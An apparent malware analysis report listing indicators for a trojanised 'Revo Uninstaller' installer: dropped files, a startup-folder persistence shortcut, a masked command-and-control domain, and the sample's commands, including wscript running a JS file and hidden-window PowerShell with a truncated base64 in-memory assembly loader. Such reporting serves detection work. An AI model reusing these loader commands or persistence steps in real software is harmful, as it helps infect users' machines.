Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\viva.ini.lnk
- %APPDATA%\revo.uninstaller.pro-4.2.3.exe
- %APPDATA%\my.js
- %TEMP%\nsw3a3.tmp
- %TEMP%\nsl3b3.tmp\langdll.dll
- %TEMP%\nsl3b3.tmp\rus-r.bmp
- %TEMP%\nsl3b3.tmp\eng-r.bmp
- %TEMP%\nsl3b3.tmp\ukr-r.bmp
- %TEMP%\nsl3b3.tmp\orange-r.bmp
- %TEMP%\nsl3b3.tmp\modern-header.bmp
- %TEMP%\nsl3b3.tmp\modern-wizard.bmp
- %TEMP%\nsl3b3.tmp\aero.dll
- %TEMP%\nsl3b3.tmp\brandingurl.dll
- %TEMP%\nsl3b3.tmp\nsdialogs.dll
- %TEMP%\nsl3b3.tmp\system.dll
- %HOMEPATH%\appdata\viva.js
- 'tu###ong.top':80
- DNS ASK tu###ong.top
- '%APPDATA%\revo.uninstaller.pro-4.2.3.exe'
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\My.js"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...